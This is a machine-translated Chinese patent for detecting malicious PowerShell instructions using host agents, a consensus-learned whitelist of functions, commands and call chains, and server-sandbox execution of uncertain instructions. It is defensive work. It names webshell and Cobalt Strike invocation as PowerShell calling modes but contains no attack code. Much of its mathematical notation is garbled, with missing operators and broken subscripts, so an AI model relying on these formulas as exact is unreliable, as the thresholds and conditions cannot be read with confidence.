Powershell malicious instruction detection method and system

文档序号：169022 发布日期：2021-10-29 浏览：44次中文

阅读说明：本技术 一种powershell恶意指令检测方法及其系统 (Powershell malicious instruction detection method and system ) 是由毛菲刘隽良柳遵梁刘聪于 2021-09-24 设计创作，主要内容包括：本发明实施例公开了一种powershell恶意指令检测方法及其系统。方法包括：获取powershell调用方式集合；将powershell调用方式集合与调用方式白名单进行匹配；采集powershell基础信息；根据powershell基础信息,生成powershell基础行为白名单；发送至主机,当主机检测到有新增powershell指令时,主机获取指令信息,并将指令信息与powershell基础行为白名单进行匹配,以得到待定指令合集；将待定指令合集置于服务器沙箱中执行,以得到执行结果；根据执行结果进行指令的处理。通过实施本发明实施例的方法可实现有效识别多变的powershell恶意指令。(The embodiment of the invention discloses a powershell malicious instruction detection method and a powershell malicious instruction detection system. The method comprises the following steps: acquiring a powershell calling mode set; matching the powershell calling mode set with a calling mode white list; collecting powershell basic information; generating a powershell basic behavior white list according to powershell basic information; sending the instruction information to a host, and when the host detects that a powershell instruction is newly added, acquiring the instruction information by the host, and matching the instruction information with a powershell basic behavior white list to obtain an undetermined instruction set; placing the set of pending instructions in a server sandbox for execution to obtain an execution result; and processing the instruction according to the execution result. By implementing the method provided by the embodiment of the invention, the variable powershell malicious instruction can be effectively identified.)

1. A powershell malicious instruction detection method is characterized by comprising the following steps:

acquiring a powershell calling mode set;

matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set;

collecting powershell basic information;

performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning so as to generate a powershell basic behavior white list based on consensus;

sending the powershell basic behavior white list to a host, when the host detects that a new powershell instruction is added, acquiring new powershell instruction information by the host, and matching the new powershell instruction information with the powershell basic behavior white list to obtain an undetermined instruction set;

acquiring the set of pending instructions;

placing the set of pending instructions in a server sandbox for execution to obtain an execution result;

and blocking abnormal instructions and alarming related information according to the execution result, releasing non-abnormal instructions and executing the non-abnormal instructions.

2. The powershell malicious instruction detection method of claim 1, wherein the matching the powershell calling style set with a powershell calling style whitelist to obtain a legal calling style set comprises:

and screening elements in the powershell calling mode set, which are consistent with the powershell calling mode white list, so as to obtain a legal calling mode set.

3. The powershell malicious instruction detection method of claim 1, wherein the powershell basic information comprises powershell basic information of each host in the host group, and the powershell basic information of each host comprises a host code, a powershell function data set to be executed, a powershell function call chain set and a powershell command set to be executed.

4. The powershell malicious instruction detection method of claim 3, wherein the performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning to generate a consensus-based powershell basic behavior white list comprises:

performing consensus learning according to all executed powershell command sets in the host group, and generating a unique powershell safety command set of all the host groups to obtain a safety command set;

performing consensus learning according to all powershell function call chain sets in the host group, and generating a unique powershell security function call chain set of the host group to obtain a security function call chain set;

the powershell basic behavior white list comprises a security function set, a security command set and a security function call chain set.

5. The powershell malicious instruction detection method of claim 4, wherein the performing consensus learning according to all executed powershell function data sets in the host group generates a powershell security function set which is all and unique to the host group to obtain a security function set, comprises:

screening out powershell functions corresponding to elements exceeding a set frequency threshold value in the frequency statistic set of each host to form a powershell safety function set of each host;

integrating the powershell security function set of each host to form a whole security function set;

and carrying out element duplication removal on all the safety function sets to obtain a safety function set.

6. The powershell malicious instruction detection method of claim 4, wherein the performing consensus learning according to all the powershell function call chain sets in the host group generates a powershell security function call chain set which is all and unique to the host group to obtain a security function call chain set, comprises:

integrating the set of security function call chains of each host to form a set of complete security function call chains;

and carrying out element duplication removal on all the safety function call chain sets to obtain a safety function call chain set.

7. The method as claimed in claim 1, wherein the step of sending the powershell basic behavior white list to the host, when the host detects that there is a new powershell command, the host obtains information of the new powershell command, and matches the new information of the powershell command with the powershell basic behavior white list to obtain the pending command aggregate includes:

sending the powershell basic behavior white list to a host;

when the host computer detects that a new powershell instruction is added, the host computer obtains information of the new powershell instruction;

the host screens out elements of a powershell function calling chain in the newly added powershell instruction information, which belong to a security function calling chain set, and powershell commands in the newly added powershell instruction information, which belong to powershell commands corresponding to the elements in a security command set, so as to form security instructions, and the security instructions are released;

screening out powershell commands in the newly-added powershell command information by the host computer, wherein the powershell commands do not belong to powershell commands corresponding to elements in the safe command set, so as to form unsafe commands, and blocking the unsafe commands and giving an alarm to relevant information;

and screening out the powershell function calling chain in the newly added powershell instruction information which does not belong to the elements in the security function calling chain set but the powershell command in the newly added powershell instruction information which belongs to the powershell command corresponding to the elements in the security command set by the host to form an undetermined instruction set.

8. The powershell malicious instruction detection method according to claim 1, wherein the blocking of abnormal instructions and the warning of related information are performed according to the execution result, and non-abnormal instructions are released and executed, including;

and when the execution result is that the corresponding instruction is a non-abnormal instruction, sending a release notice of the non-abnormal instruction to the host of the corresponding instruction according to the execution result, and allowing the corresponding host to execute the non-abnormal instruction.

9. A powershell malicious instruction detection system, comprising:

the first acquisition unit is used for acquiring a powershell calling mode set;

the first matching unit is used for matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set;

the acquisition unit is used for acquiring powershell basic information;

the consensus learning unit is used for performing powershell data analysis statistics according to the powershell basic information so as to perform consensus mechanism learning and generate a consensus-based powershell basic behavior white list;

the transmitting unit is used for transmitting the powershell basic behavior white list to a host, when the host detects a new powershell instruction, the host acquires new powershell instruction information and matches the new powershell instruction information with the powershell basic behavior white list to obtain an undetermined instruction set;

the second acquisition unit is used for acquiring the pending instruction set;

the execution unit is used for placing the set of the pending instructions in a server sandbox for execution to obtain an execution result;

and the processing unit is used for blocking the abnormal instruction and alarming related information according to the execution result, releasing the non-abnormal instruction and executing the non-abnormal instruction.

10. The powershell malicious instruction detection system according to claim 9, wherein the first matching unit is configured to filter elements in the powershell calling style set that are consistent with a powershell calling style white list, so as to obtain a legal calling style set.

Technical Field

The invention relates to a computer, in particular to a powershell malicious instruction detection method and a powershell malicious instruction detection system.

Background

powershell is a powerful command line tool developed by microsoft, has many uses and powerful functions, and opens a convenient door for malicious code authors while facilitating the use of users. An attacker can download malicious codes to a user system for operation by using a powershell command, and can call the powershell through a command line to load a section of encrypted data into a memory for execution.

At present, the traditional powershell malicious instruction identification is only based on known malicious commands or strategies, so that a large number of false reports and missed reports often occur on the aspect of security problems, and disadvantages often exist on the aspects of information updating and threat sniffing; meanwhile, the safety judgment is based on the command blacklist, and the command blacklist is often a known threat arrangement set, so that the conventional powershell safety strategy rule stays in a 'afterwards ZhuGeliang' state for a long time, namely only relevant problems are outbreaked in a large scale, and the rear part with known command characteristics can update relevant safety strategies, so that relevant detection and alarm are carried out on the safety strategies. Therefore, the current powershell instruction detection and identification method cannot effectively identify variable powershell malicious instructions.

Therefore, a new method is needed to be designed, and the diversified powershell malicious instructions can be effectively identified.

Disclosure of Invention

The invention aims to overcome the defects of the prior art and provides a powershell malicious instruction detection method and a powershell malicious instruction detection system.

In order to achieve the purpose, the invention adopts the following technical scheme: a powershell malicious instruction detection method comprises the following steps:

acquiring a powershell calling mode set;

matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set;

collecting powershell basic information;

acquiring the set of pending instructions;

placing the set of pending instructions in a server sandbox for execution to obtain an execution result;

and blocking abnormal instructions and alarming related information according to the execution result, releasing non-abnormal instructions and executing the non-abnormal instructions.

The further technical scheme is as follows: the step of matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set comprises the following steps:

and screening elements in the powershell calling mode set, which are consistent with the powershell calling mode white list, so as to obtain a legal calling mode set.

The further technical scheme is as follows: the powershell basic information comprises powershell basic information of each host in the host group main, and the powershell basic information of each host comprises a host code, an executed powershell function data set, a powershell function call chain set and an executed powershell command set.

The further technical scheme is as follows: performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning so as to generate a consensus-based powershell basic behavior white list, including:

the powershell basic behavior white list comprises a security function set, a security command set and a security function call chain set.

The further technical scheme is as follows: the common learning is carried out according to all executed powershell function data sets in the host group, and a powershell safety function set which is all and unique to the host group is generated to obtain a safety function set, wherein the common learning comprises the following steps:

integrating the powershell security function set of each host to form a whole security function set;

and carrying out element duplication removal on all the safety function sets to obtain a safety function set.

The further technical scheme is as follows: the common-recognition learning is carried out according to all powershell function call chain sets in the host group, and a powershell safety function call chain set which is all and unique to the host group is generated to obtain a safety function call chain set, and the common-recognition learning comprises the following steps:

integrating the set of security function call chains of each host to form a set of complete security function call chains;

and carrying out element duplication removal on all the safety function call chain sets to obtain a safety function call chain set.

The further technical scheme is as follows: the sending of the powershell basic behavior white list to a host, when the host detects that a new powershell instruction is added, the host acquires new powershell instruction information and matches the new powershell instruction information with the powershell basic behavior white list to obtain an undetermined instruction set, and the method comprises the following steps:

sending the powershell basic behavior white list to a host;

when the host computer detects that a new powershell instruction is added, the host computer obtains information of the new powershell instruction;

The further technical scheme is as follows: the blocking of abnormal instructions and the related information of alarm are carried out according to the execution result, and non-abnormal instructions are released and executed, including;

The invention also provides a powershell malicious instruction detection system, which comprises:

the first acquisition unit is used for acquiring a powershell calling mode set;

the first matching unit is used for matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set;

the acquisition unit is used for acquiring powershell basic information;

the second acquisition unit is used for acquiring the pending instruction set;

the execution unit is used for placing the set of the pending instructions in a server sandbox for execution to obtain an execution result;

The further technical scheme is as follows: and the first matching unit is used for screening elements which are consistent with a whitelist of the powershell calling modes in the powershell calling mode set so as to obtain a legal calling mode set.

Compared with the prior art, the invention has the beneficial effects that: according to the method, the powershell calling mode is detected, the white list matched with the powershell calling mode is detected, when the powershell executing script or command is detected, the white list matched with the powershell basic behavior is released, and the successfully matched powershell behavior is released; for the powershell behaviors which are not successfully matched, executing powershell scripts or commands need to be placed into an endpoint host buffer area, the powershell scripts or commands are executed and detected by a server sandbox, the scripts or commands can be released by the host buffer area after abnormal behavior judgment, a powershell basic behavior white list is generated by regularly performing information acquisition and common identification mechanism learning on the executed scripts or commands, accurate powershell malicious instruction detection can be achieved, and variable powershell malicious instructions can be effectively identified.

The invention is further described below with reference to the accompanying drawings and specific embodiments.

Drawings

In order to more clearly illustrate the technical solutions of the embodiments of the present invention, the drawings needed to be used in the description of the embodiments are briefly introduced below, and it is obvious that the drawings in the following description are some embodiments of the present invention, and it is obvious for those skilled in the art to obtain other drawings based on these drawings without creative efforts.

Fig. 1 is a schematic view of an application scenario of a powershell malicious instruction detection method according to an embodiment of the present invention;

fig. 2 is a schematic flowchart of a method for detecting a malicious instruction in powershell according to an embodiment of the present invention;

fig. 3 is a sub-flow diagram of a powershell malicious instruction detection method according to an embodiment of the present invention;

fig. 4 is a sub-flow diagram of a powershell malicious instruction detection method according to an embodiment of the present invention;

fig. 5 is a sub-flow diagram of a powershell malicious instruction detection method according to an embodiment of the present invention;

fig. 6 is a schematic block diagram of a powershell malicious instruction detection system according to an embodiment of the present invention;

fig. 7 is a schematic block diagram of a consensus learning unit of a powershell malicious instruction detection system according to an embodiment of the present invention;

fig. 8 is a schematic block diagram of a security function set determination subunit of a powershell malicious instruction detection system according to an embodiment of the present invention;

fig. 9 is a schematic block diagram of a secure function call chain set determination subunit of the powershell malicious instruction detection system according to the embodiment of the present invention;

FIG. 10 is a schematic block diagram of a computer device provided by an embodiment of the present invention.

Detailed Description

The technical solutions in the embodiments of the present invention will be clearly and completely described below with reference to the drawings in the embodiments of the present invention, and it is obvious that the described embodiments are some, not all, embodiments of the present invention. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present invention.

It will be understood that the terms "comprises" and/or "comprising," when used in this specification and the appended claims, specify the presence of stated features, integers, steps, operations, elements, and/or components, but do not preclude the presence or addition of one or more other features, integers, steps, operations, elements, components, and/or groups thereof.

It is also to be understood that the terminology used in the description of the invention herein is for the purpose of describing particular embodiments only and is not intended to be limiting of the invention. As used in the specification of the present invention and the appended claims, the singular forms "a," "an," and "the" are intended to include the plural forms as well, unless the context clearly indicates otherwise.

It should be further understood that the term "and/or" as used in this specification and the appended claims refers to and includes any and all possible combinations of one or more of the associated listed items.

Referring to fig. 1 and fig. 2, fig. 1 is a schematic view of an application scenario of a powershell malicious instruction detection method according to an embodiment of the present invention. Fig. 2 is a schematic flow chart of a powershell malicious instruction detection method according to an embodiment of the present invention. The powershell malicious instruction detection method is applied to a server. The server carries out data interaction with hosts of multiple endpoints, calls a powershell calling mode set of the hosts by the server, collects powershell basic information, generates a powershell basic behavior white list, sends the whitelist to the hosts to detect respective new powershell instructions, places the undetermined instructions in a server sandbox for execution, blocks and alarms abnormal instructions, releases the abnormal instructions and executes the non-abnormal instructions.

Fig. 2 is a schematic flowchart of a powershell malicious instruction detection method according to an embodiment of the present invention. As shown in fig. 2, the method includes the following steps S110 to S180.

And S110, acquiring a powershell calling mode set.

In this embodiment, the method is implemented by installing agent software on each host. agent software needs to detect powershell calling mode in endpoint host in real time and obtain endpoint host code number T_xAnd the host powershell calling mode set T_Wx。

In one embodiment, the host group T includes 10 hosts, i.e., T { T }₁，T₂，……，T₁₀}. In particular, at the endpoint host group T { T }₁，T₂，……，T₁₀Installing agent software on each host, detecting powershell calling mode in the endpoint host in real time, and acquiring the code number T of the endpoint host_xAnd the host powershell calling mode set T_Wx. In this embodiment, endpoint host T is detected at a time₁The powershell is called by two modes respectively, namely the collected data are as follows: host T₁：T_W1{S_1W1，S_2W1}。

The powershell call comprises: GUI calls, cmd calls, web or business system command execution interface calls, database calls, webshell calls, cobeltstrike calls, and the like. Establishing a powershell calling mode white list Pall { P } according to the powershell calling mode₁，P₂，……，P_nIn which P is₁，P₂，……，P_nCalling mode for powershell.

And S120, matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set.

In this embodiment, the legal calling mode set refers to a set formed by elements in the powershell calling mode set, which are consistent with a powershell calling mode white list.

Specifically, screening elements in the powershell calling mode set, which are consistent with the powershell calling mode white list, to obtain a legal calling mode set.

Specifically, anomaly alignment algorithm F₁The specific decision is as follows for the endpoint host group T { T }₁，T₂，……，T_nIn which T is₁，T₂，……，T_nFor each host code, acquiring a calling mode set { T } of each host powershell_W1，T_W2，……，T_WnAnd calculating the matching condition of the calling mode of each host powershell and the white list Pall of the calling modes of the powershell. Let the current endpoint host be T_xThe powershell calling mode set is T_WxStatistical set T_WxEach of the calling mode data S_yWxCalling mode white list P with powershell_allIs matched, calculate F₁{(S_yWx，P_all)};

When S is_yWxWhen the vector belongs to Pall, F1{ (S)_yWx，P_all) =0, consider powershell call mode S of endpoint host_yWxIf the calling is legal, the powershell can be normally called; when S is_yWx∉ Pall, then F1{ (S)_yWx，P_all) =1, consider powershell call mode S of endpoint host_yWxIf the calling is illegal, the powershell calling fails, and relevant information is alarmed.

S130, collecting powershell basic information.

In this embodiment, the powershell basic information includes powershell basic information of each host in the host group, and the powershell basic information of each host includes a host code, an executed powershell function data set, a powershell function call chain set, and an executed powershell command set.

The method is realized by installing agent software on each host, the host data acquisition interval H can be set by a user in a user-defined mode, and the default acquisition interval H =24 hours. The minimum value Tmin =10 of the data source of the basic information of the obtained endpoint host powershell, namely the participating host group T, is not limited. In this example, the user does not define the collection interval H, i.e., H is a default interval of 24 hours, i.e., the powershell basic information collection is performed every 24 hours.

Assume host group { T₁，T₂，……，T₁₀50 powershell instructions are executed in each instruction, and the powershell basic information received by the server is as follows:

set of powershell functions executed: { T_M1，T_M2，T_M3，……，T_M10}；

Powershell function call chain set: { T_S1，T_S2，T_S3，……，T_S10}；

Powershell command data set executed: { T_G1，T_G2，T_G3，……，T_G10}。

And S140, performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning so as to generate a powershell basic behavior white list based on consensus.

In this embodiment, the powershell basic behavior white list includes a security function set, a security command set, and a security function call chain set.

In an embodiment, referring to fig. 3, the step S140 may include steps S141 to S143.

S141, performing consensus learning according to all executed powershell function data sets in the host group, and generating a unique powershell safety function set of the host group to obtain a safety function set.

In this embodiment, the security function set refers to a set of functions, in which the number of times that the powershell function is counted in the powershell function data set executed by another host exceeds a set threshold, where the number of times is counted in the powershell function data set.

In one embodiment, referring to FIG. 4, the step S141 includes steps S1411 to S1414.

S1411, for each host in the host group, comparing the powershell function data set executed by the host with powershell function data sets executed by other hosts in the host group, and counting the times of each powershell function in the powershell function data set executed by the current host in the powershell function data set executed by other hosts to obtain a time counting set of each host.

In this embodiment, the number-of-times statistic set of each host refers to a set formed by the number of times that each powershell function in the powershell function data set executed by the host of each host appears in the powershell function data sets executed by other hosts.

In particular, there is an algorithm F₂The algorithm compares powershell functions executed by all hosts acquired from the host group T, and judges whether unknown abnormal functions exist.

Algorithm F₂The specific determination is as follows for the host group T { T }₁，T₂，……，T_nIn which T is₁，T₂，……，T_nCode the number of each host, and obtain the powershell function set { T) executed by each host_M1，T_M2，……，T_MnAnd calculating the matching condition of the powershell function executed by each host and the powershell functions executed by other endpoint hosts in the group. Let current host be T_xThe powershell function set executed by the system is T_MxThen T is_MxShould be equal to { T_M1，T_M2，……，T_MnDivide by T_MxAll external powershell function set T executed by endpoint host_except(Mx)Comparing and calculating F₂(T_Mx，T_except(Mx)) And counting the set T_MxEach powershell function L in_yMxIn the set T_except(Mx)Number of occurrences S_yAnd generates a set T_MxEach powershell function L in_yMxIn the set T_except(Mx)Statistical set of number of occurrences S_Mx{S₁，S₂，S₃，……，S_n}。

In this embodiment, L is given_1M1For example, count L_1M1Powershell function set T executed at each host_except(M1){T_M2，T_M3，T_M4，……，T_M10The number of occurrences in (f) gives S₁. With L_2M1For example, count L_2M1Powershell function set T executed at each endpoint host_except(M1){T_M2，T_M3，T_M4，……，T_M10The number of occurrences in (f) gives S₂. And the like, and finally generating a set T_M1Each powershell function L in_yM1In the set T_except(M1)Statistical set of number of occurrences S_M1{S₁，S₂，S₃，……，S₅₀}。

And S1412, screening out powershell functions corresponding to elements exceeding a set frequency threshold in the frequency statistic set of each host to form a powershell safety function set of each host.

In this embodiment, the powershell security function set of each host is a set formed by powershell functions corresponding to elements exceeding a set frequency threshold in the frequency statistic set of each host.

In particular, there is a consensus comparison algorithm F₃，F₃{(S_yN) is a specified threshold value, defaults to a certain value and can be manually set; algorithm F₃Will count the number of times to set S_Mx{S₁，S₂，S₃，……，S_nEach of the elements S_yComparing with N when S is_y When N is, then F₃{(S_yN) } =0, the powershell function is judged to be in accordance with the consensus mechanism, the corresponding powershell function is safe, and S is calculated_yCorresponding powershell function L_yMxPut into the host T_xSet of powershell security functions W_Mx(ii) a When S is_y<When N is, then F₃{(S_yN) } =1, it is considered that the consensus mechanism determination is not met, and exception handling is performed.

In this example, the default number of powershell functions to be executed is limited to 60% of the total number of hosts, and the default value of N is 6, which can also be adjusted according to actual situations.

Algorithm F₃Collecting the times statistics S_M1{S₁，S₂，S₃，……，S₅₀Each of the elements S_yCompare with 6. In this example, S₁ 6, then F₃{(S_yN) } =0, the powershell function is judged to be in accordance with the consensus mechanism, the corresponding powershell function is safe, and S is calculated₁Corresponding powershell function L_1M1Put into the host T₁The powershell security function set WM 1; s₂<6, then F₃{(S_yN) } =1, consider S₂Corresponding powershell function L_2M1And if the common identification mechanism is not met, exception handling is carried out. By analogy, the times statistics are collected into a set S_M1{S₁，S₂，S₃，……，S₅₀Each of the elements S_yCompare with 6 one by one. In this example, S₂、S₆、S₁₀、S₁₃、S₂₀、S₂₃、S₃₉、S₄₀The corresponding value is less than 6, and therefore corresponds to powershell function: l is_2M1，L_6M1，L_10M1，L_13M1，L_20M1，L_23M1，L_39M1，L_40M1The common learning mechanism is not satisfied, so the remaining 42 powershell functions except the 8 powershell functions are put into the host T₁Set of powershell security functions W_M1。

And S1413, integrating the powershell security function set of each host to form a whole security function set.

In this embodiment, the entire set of security functions refers to the powershell security function set of all hosts.

And S1414, performing element duplication removal on all the security function sets to obtain a security function set.

In this embodiment, the consensus mechanism is determined for powershell function data executed in all host groups one by one, and a host group T { T } is generated₁，T₂，……，T₁₀Set of all powershell security functions in W_M1，W_M2，W_M3，……，W_M10}. For { W_M1，W_M2，W_M3，……，W_M10Removing the duplication of each set element in the group, and finally generating a host group T { T }₁，T₂，……，T₁₀All and only powershell security function set W_all。

And S142, performing consensus learning according to all executed powershell command sets in the host group, and generating all and only powershell safety command sets of the host group to obtain a safety command set.

In this embodiment, the secure command set refers to a set of functions, where the number of times that the executed powershell command set counts in the executed powershell command sets of other hosts exceeds a set threshold, and the functions correspond to the executed powershell command set.

The generation manner of the security command set is similar to that of the security function set, and is not described herein again.

And S143, performing consensus learning according to all powershell function call chain sets in the host group, and generating all and only powershell security function call chain sets of the host group to obtain a security function call chain set.

In this embodiment, the security function call chain set refers to a set formed by corresponding elements of the powershell function call chain set of each host belonging to the security function set.

In an embodiment, referring to fig. 5, the step S143 may include steps S1431 to S1432.

S1431, screening powershell function call chains matched with the security function set in the powershell function call chain set corresponding to each host in the host group to obtain a security function call chain set of each host.

In this embodiment, the security function call chain set of each host refers to a set formed by elements, corresponding to the powershell function call chain set, in the powershell function call chain set corresponding to each host, and the elements are consistent with the powershell function call chain matched with the security function set.

In particular, there is an algorithm F₄Aiming at each host powershell function call chain set and powershell safety function set W obtained from the host group T, the algorithm_allAnd (5) comparing, and judging whether an unknown abnormal function calling chain exists.

Algorithm F₄The specific decision is as follows for the endpoint host group T { T }₁，T₂，……，T_nIn which T is₁，T₂，……，T_nCode name for each host, and obtain the calling chain set { T ] of powershell function of each host_S1，T_S2，……，T_SnAnd calculating a calling chain and a safety function set W of each host powershell function_allThe matching case of (2). Let the current endpoint host be T_XThe powershell function call chain set is T_SxStatistical set T_SxEach powershell function call chain H_ySxAll functions and security function sets W referred to in (1)_allIs matched, calculate F₄{(H_ySx，W_all)}；

When H is present_ySx ⊆ W_allThen F4{ (H)_ySx，W_all) =0, consider H_ySxThe corresponding powershell function call chain is safe, and H is used_ySxPutting the corresponding powershell function call chain into a host Tx security function call chain set M_Sx(ii) a When H is present_ySx⊄W_allThen F4{ (H_ySxWall) } =1, consider H_ySxAnd the corresponding powershell function call chain is an exception call chain and is subjected to exception handling.

Let the current endpoint host be T₁With a set of function call chains T_S1{H_1S1，H_2S1，H_3S1，……，H_50S1}, T should be calculated_S1Each powershell function call chain H_ySxAll functions and security function sets W referred to in (1)_allCalculating F4{ (H)_ySx，W_all)}。

In this example: h_1S1⊆W_allThen F4{ (H)_ySx，W_all) =0, consider H_1S1The corresponding powershell function call chain is safe, and H is used_1S1Putting the corresponding powershell function call chain into the host T₁Set of security function call chains M_S1；H_2S1⊄W_allThen F4{ (H)_ySx，W_all) =1, consider H_2S1And the corresponding powershell function call chain is an exception call chain and is subjected to exception handling. By parity of reasoning, the host T is connected₁Function call chain set T of_S1{H_1S1，H_2S1，H_3S1，……，H_50S1Each of the elements H_ySxAll involved functions and powershell safety function set W_allAnd (5) matching one by one. In this example, the powershell function calls the chain: h_2S1、H_6S1，H_8S1，H_33S1，H_38S11，H_47S1Not conforming to the consensus learning mechanism, the remaining 44 powershell function call chains, except the 6 powershell function call chains described above, are placed in the host T₁Set of security function call chains M_S1。

And S1432, integrating the security function call chain set of each host to form a whole security function call chain set.

In this embodiment, the set of all security function call chains refers to the set of security function call chains of all hosts.

And S1433, carrying out element duplication removal on all the safety function call chain sets to obtain a safety function call chain set.

In the present embodiment, the algorithm F is passed₄And then generating powershell security function call chain set M corresponding to each host Tx_Sx. Statistics host group T { T }₁，T₂，……，T_nSet of all powershell security functions M_S{M_S1，M_S2，M_S3，……，M_SnIs to { M }_S1，M_S2，M_S3，……，M_SnRemoving the duplication of each set element in the group, and finally generating a host group T { T }₁，T₂，……，T_nAll and only powershell security function call chain sets Mall.

Specifically, the consensus mechanism judgment is carried out on powershell function call chain data in all the host groups one by one, and the host group T { T } is generated₁，T₂，……，T₁₀Set of all powershell security function call chains in { M }_S1，M_S2，M_S3，……，M_S10}. For { M_S1，M_S2，M_S3，……，M_S10The set elements in the host group T { T1, T2, … …, Tn } all and only powershell security function call chain set M is generated_all。

S150, sending the powershell basic behavior white list to a host, when the host detects that a newly added powershell instruction exists, acquiring newly added powershell instruction information by the host, and matching the newly added powershell instruction information with the powershell basic behavior white list to obtain an undetermined instruction set.

In this embodiment, the pending instruction set refers to a set formed by a newly added powershell instruction that the host cannot determine whether the instruction is an exception.

In an embodiment, the step S150 may include the following steps:

sending the powershell basic behavior white list to a host;

when the host computer detects that a new powershell instruction is added, the host computer obtains information of the new powershell instruction;

In this embodiment, the server will know the host group T { T }₁，T₂，……，T_nAll and only powershell security command set Q_allAnd powershell security function call chain set M_allAnd issuing the command to each endpoint host, matching the command with the acquired powershell function call chain of the host and the acquired powershell command, and judging whether the command is an unknown abnormal command.

Monitoring whether a newly added powershell instruction exists through agent software installed on the endpoint host, and if the newly added powershell instruction exists on the endpoint host, acquiring newly added powershell instruction information including the endpoint host code number T_xPowershell function call chain set T_rSxExecuting powershell command data set T_rGx。

Algorithm F for the Presence of an anomaly₅The algorithm aims at the function call chain set T corresponding to the newly added powershell instruction_rSxAnd executing powershell command data set T_rGxAnd a host group T { T₁，T₂，……，T_nH.a set of security functions Q_allAnd powershell security function call chain set M_allMatching is performed and whether or not there is a match is determinedAnd adding unknown abnormal instructions.

The anomaly comparison algorithm F5 is specifically determined as follows, and the current host is set as T_xThe newly added powershell function call chain set is T_rSxThe newly added and executed powershell command data set is T_rGx. Statistics newly-added powershell function call chain set T_rSxEach function call chain H in (1)_yrSxAnd newly adding powershell command data set T_rGxEach of the commands Z_yrGxAnd a set of security functions Q_allAnd powershell security function call chain set M_allIs matched, calculate F₅{（Z_yrGx，H_yrSx），（Q_all，M_all）};

When Z is_yrGx∈Q_allAnd H_yrSx∈M_allF5{ (Z)_yrGx，H_yrSx），（Q_all，M_all) } =0, consider Z as_yrGxAnd H_yrSxThe corresponding powershell instruction is safe, and the instruction is released;

when Z is_yrGx∉Q_allWhen is no matter H_yrSx∈M_allOr H_yrSx∉M_all，F5{（Z_yrGx，H_yrSx），（Q_all，M_all) =1, consider Z as_yrGxAnd H_yrSxThe corresponding powershell instruction is unsafe, the instruction is blocked, and related information is alarmed at the same time;

when Z is_yrGx∈Q_allAnd H_yrSx∉M_allF5{ (Z)_yrGx，H_yrSx），（Q_all，M_all) =2, consider Z as_yrGxAnd H_yrSxThe corresponding powershell instruction is an abnormal instruction, the instruction is alarmed, the instruction is placed in a buffer area of an endpoint host Tx, and Z is added_yrGxAnd H_yrSxPutting the corresponding powershell instruction into a pending instruction set R_Dx。

For example: detecting an endpoint host T₁If 4 newly-added powershell instructions are executed, the end point host T₁Agent monitoring software in the system automatically acquires newly added poThe wershell instruction information: newly-added powershell function call chain set T_rS5{H_1rS1，H_2rS1，H_3rS1，H_4rS1And newly added powershell command data set T_rG5{Z_1rG1，Z_2rG1，Z_3rG1，Z_4rG1For a host group T { T }₁，T₂，……，T₁₀H.a set of security functions Q_allAnd powershell security function call chain set M_allIs matched, calculate F₅{（Z_yrGx，H_yrSx），（Q_all，M_all）}；

In this example:

Z_1rG1∈Q_alland H_1rS1∈M_allThen F is₅{（Z_yrGx，H_yrSx），（Q_all，M_all) } =0, consider Z as_1rG1And H_1rS1The corresponding powershell instruction is safe, and the instruction is released;

Z_2rG1∉ Qall, then H is nothing_2rS1∈M_allOr H_2rS1∉M_all，F₅{（Z_yrGx，H_yrSx），（Q_all，M_all) =1, consider Z as_2rG1And H_2rS1The corresponding powershell instruction is unsafe, the instruction is blocked, and related information is alarmed at the same time;

Z_3rG1∈Q_alland H_3rS1∉M_all，F5{（Z_yrGx，H_yrSx），（Q_all，M_all）}=2；

Z_4rG1∈Q_allAnd H4rS1 ∉ Mall, F5{ (Z)_yrGx，H_yrSx），（Q_all，M_all) = 2; consider Z3rG1, H_3rS1And Z_4rG1、H_4rS1The corresponding powershell instruction is an abnormal instruction, the instruction is alarmed, and the instruction is placed in the host T₁In the buffer of (2), and then Z is added_3rG1、H_3rS1And Z_4rG1、H_4rS1Putting the corresponding powershell instruction into a pending instruction set R_D1{K_1D1，K_2D1}。

S160, acquiring the pending instruction set;

s170, placing the set of the pending instructions in a server sandbox for execution to obtain an execution result.

In this embodiment, the execution result refers to a result of the pending instruction set executed in the server sandbox.

Passing algorithm F₅Then generates powershell pending instruction set R_DxCounting the host group T { T }₁，T₂，……，T_nAll powershell pending instruction set R_D1，R_D2，R_D3，……，R_DnAccording to each powershell instruction K in the instruction list_yDxThe host code number x of (2) is sequentially sent to the corresponding endpoint host T_xAnd acquiring a corresponding instruction, placing the instruction in a server sandbox for execution, and judging abnormal behaviors.

For the above example: uniting powershell pending instructions into a set R_D1{K_1D1，K_2D1According to host code number, sequentially corresponding host T₁And acquiring a corresponding powershell instruction, placing the powershell instruction in a server sandbox for execution, and recording an execution result.

S180, blocking abnormal instructions and alarming related information are carried out according to the execution result, non-abnormal instructions are released, and the non-abnormal instructions are executed.

Specifically, when the execution result is that the corresponding instruction is an abnormal instruction, sending a blocking notification of the abnormal instruction to a host of the corresponding instruction according to the execution result, and alarming related information;

In the present embodiment, T { T } is for the host group₁，T₂，……，T_nAll powershell pending instruction set R_D1，R_D2，R_D3，……，R_DnAccording to each powershell instruction in the instruction listK_yDxThe execution result in the server sandbox is manually judged, and an instruction K is sent_yDxIs based on K_yDxThe host code x sequentially sends the sandbox judgment result to the corresponding host. If the command has malicious behavior, blocking the command in a corresponding host buffer area, and alarming related information; if the instruction has no malicious behavior, the instruction is released in the corresponding host buffer area, and the host is allowed to execute the instruction.

For the above example: according to powershell pending instruction K_1D1，K_2D1The result in the server sandbox is manually judged, and an instruction K is sent_1D1，K_2D1Is based on K_yDxHost code number 1 to corresponding host T₁And sending a sandbox judgment result. In this example, instruction K_1D1If there is a malicious behavior, the host T corresponding to the malicious behavior is determined₁Blocking the instruction in the buffer area and alarming related information; instruction K_2D1If no malicious behavior exists, the host T corresponding to the malicious behavior is determined₁Release in buffer while allowing host T₁The instruction is executed.

